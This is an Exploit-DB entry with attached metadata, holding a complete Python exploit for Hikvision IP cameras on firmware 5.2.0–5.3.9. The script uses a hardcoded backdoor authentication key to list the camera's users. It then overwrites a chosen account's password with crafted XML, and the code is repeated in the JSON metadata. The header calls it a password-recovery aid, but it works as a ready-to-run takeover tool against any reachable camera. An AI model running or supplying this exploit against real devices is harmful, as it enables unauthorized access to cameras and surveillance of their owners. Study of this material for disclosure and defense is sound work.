Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass
2018-03-23T00:00:00
ID EDB-ID:44328 Type exploitdb Reporter Exploit-DB Modified 2018-03-23T00:00:00
Description
Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass. Webapps exploit for XML platform
# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor
# Date: 15-03-2018
# Vendor Homepage: http://www.hikvision.com/en/
# Exploit Author: Matamorphosis
# Category: Web Apps
# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner recover their password.
# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23
#!/usr/bin/env python
# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]
import requests
import re
import sys
# BASIC INFO
newPass = "@Dm1N1$Tr80R" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.
BackdoorAuthArg = "auth=YWRtaW46MTEK"; # AUTHENTICATION KEY.
ip = ""
port = 0
SSL = ""
userID = ""
userName = ""
def Usage():
print("[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]")
try:
ip = sys.argv[1]
SSL = sys.argv[3]
except:
print("[-] One or more of the arguments is missing.")
Usage()
sys.exit()
ipmatch = re.search(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", ip) # IP ADDRESS REGULAR EXPRESSION.
if not ipmatch:
print("[-] The entered ip address " + ip + " is not in the correct format.")
Usage()
sys.exit()
try:
port = int(sys.argv[2])
except:
print("[-] The entered port " + sys.argv[2] + " is not a number.")
Usage()
sys.exit()
if (port == 0) or (port > 65535):
print("[-] The entered port " + sys.argv[2] + " is not a valid port number.")
Usage()
sys.exit()
if SSL == "Y":
protocol = "https"
else:
protocol = "http"
URLBase = protocol + "://" + ip + ":" + str(port) + "/" # URL BASE FOR FUTURE REQUESTS.
URLDownload = URLBase + "Security/users?" + BackdoorAuthArg # DOWNLOAD REQUEST.
print("[+] Getting User List.")
DownloadResponse = requests.get(URLDownload).text
for line in DownloadResponse: # RETRIEVING USER LIST
useridmatch = re.search(r"<id>(.*)<\/id>", line) # CHECK FOR USER ID.
usernamematch = re.search(r"<userName>(.*)<\/userName>", line) # CHECK FOR USER NAME.
if useridmatch:
userID = useridmatch.group(1)
print("[+] User ID: " + userID)
if usernamematch:
userName = usernamematch.group(1)
print("[+] Username: " + userName)
userID = raw_input("[?] Which User ID would you like to use? ")
userName = raw_input("[?] Which Username would you like to use? ")
print("[+] Using the User " + userName + ".")
userXML = ( '<User version=""1.0"" xmlns=""http://www.hikvision.com/ver10/XMLSchema"">\r\n<id>' + userID + '</id>\r\n<userName>' + userName + '</userName>\r\n<password>' + newPass + '</password>\r\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE
#print(userXML)
URLUpload = URLBase + "Security/users/" + userID + "?" + BackdoorAuthArg # UPLOAD REQUEST.
print("[+] Changing Password now.")
print requests.put(URLUpload, data=userXML).text # UPLOAD REQUEST, SENDING THE PAYLOAD.
print("[+] Complete. Please try logging in with these credentials. Username: " + userName + "Password: " + newPass)
{"id": "EDB-ID:44328", "hash": "a46d95fbd555b173c1b4060a6eb616b0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass", "description": "Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass. Webapps exploit for XML platform", "published": "2018-03-23T00:00:00", "modified": "2018-03-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/44328/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2018-05-24T14:09:14", "history": [], "viewCount": 28, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-05-24T14:09:14"}, "dependencies": {"references": [], "modified": "2018-05-24T14:09:14"}, "vulnersScore": 0.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/44328/", "sourceData": "# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor\r\n# Date: 15-03-2018\r\n# Vendor Homepage: http://www.hikvision.com/en/\r\n# Exploit Author: Matamorphosis\r\n# Category: Web Apps\r\n# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner recover their password.\r\n# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23\r\n\r\n#!/usr/bin/env python\r\n# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]\r\n\r\nimport requests\r\nimport re\r\nimport sys\r\n\r\n# BASIC INFO\r\n\r\nnewPass = \"@Dm1N1$Tr80R\" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.\r\nBackdoorAuthArg = \"auth=YWRtaW46MTEK\"; # AUTHENTICATION KEY.\r\nip = \"\"\r\nport = 0\r\nSSL = \"\"\r\nuserID = \"\"\r\nuserName = \"\"\r\n\r\ndef Usage():\r\n\tprint(\"[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]\")\r\n\r\ntry:\r\n\tip = sys.argv[1]\r\n\tSSL = sys.argv[3]\r\n\r\nexcept:\r\n\tprint(\"[-] One or more of the arguments is missing.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\nipmatch = re.search(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", ip) \t\t\t# IP ADDRESS REGULAR EXPRESSION.\r\n\r\nif not ipmatch:\r\n\tprint(\"[-] The entered ip address \" + ip + \" is not in the correct format.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\ntry:\r\n\tport = int(sys.argv[2])\r\n\r\nexcept:\r\n\tprint(\"[-] The entered port \" + sys.argv[2] + \" is not a number.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\nif (port == 0) or (port > 65535):\r\n\tprint(\"[-] The entered port \" + sys.argv[2] + \" is not a valid port number.\")\r\n\tUsage()\r\n\tsys.exit()\r\n\r\nif SSL == \"Y\":\r\n\tprotocol = \"https\"\r\n\r\nelse:\r\n\tprotocol = \"http\"\r\n\r\nURLBase = protocol + \"://\" + ip + \":\" + str(port) + \"/\" \t\t\t\t\t# URL BASE FOR FUTURE REQUESTS.\r\nURLDownload = URLBase + \"Security/users?\" + BackdoorAuthArg \t\t\t\t# DOWNLOAD REQUEST.\r\n\r\nprint(\"[+] Getting User List.\")\r\n\r\nDownloadResponse = requests.get(URLDownload).text\r\n\r\nfor line in DownloadResponse: \t\t\t\t\t\t\t\t\t\t\t\t# RETRIEVING USER LIST\r\n\tuseridmatch = re.search(r\"<id>(.*)<\\/id>\", line) \t\t\t\t\t\t# CHECK FOR USER ID.\r\n\tusernamematch = re.search(r\"<userName>(.*)<\\/userName>\", line) \t\t\t# CHECK FOR USER NAME.\r\n\r\n\tif useridmatch:\r\n\t\tuserID = useridmatch.group(1)\r\n\t\tprint(\"[+] User ID: \" + userID)\r\n\r\n\tif usernamematch:\r\n\t\tuserName = usernamematch.group(1)\r\n\t\tprint(\"[+] Username: \" + userName)\r\n\r\nuserID = raw_input(\"[?] Which User ID would you like to use? \")\r\nuserName = raw_input(\"[?] Which Username would you like to use? \")\r\n\r\nprint(\"[+] Using the User \" + userName + \".\")\r\n\r\nuserXML = ( '<User version=\"\"1.0\"\" xmlns=\"\"http://www.hikvision.com/ver10/XMLSchema\"\">\\r\\n<id>' + userID + '</id>\\r\\n<userName>' + userName + '</userName>\\r\\n<password>' + newPass + '</password>\\r\\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE\r\n\r\n#print(userXML)\r\n\r\nURLUpload = URLBase + \"Security/users/\" + userID + \"?\" + BackdoorAuthArg \t# UPLOAD REQUEST.\r\n\r\nprint(\"[+] Changing Password now.\")\r\n\r\nprint requests.put(URLUpload, data=userXML).text \t\t\t\t\t\t\t# UPLOAD REQUEST, SENDING THE PAYLOAD.\r\n\r\nprint(\"[+] Complete. Please try logging in with these credentials. Username: \" + userName + \"Password: \" + newPass)", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}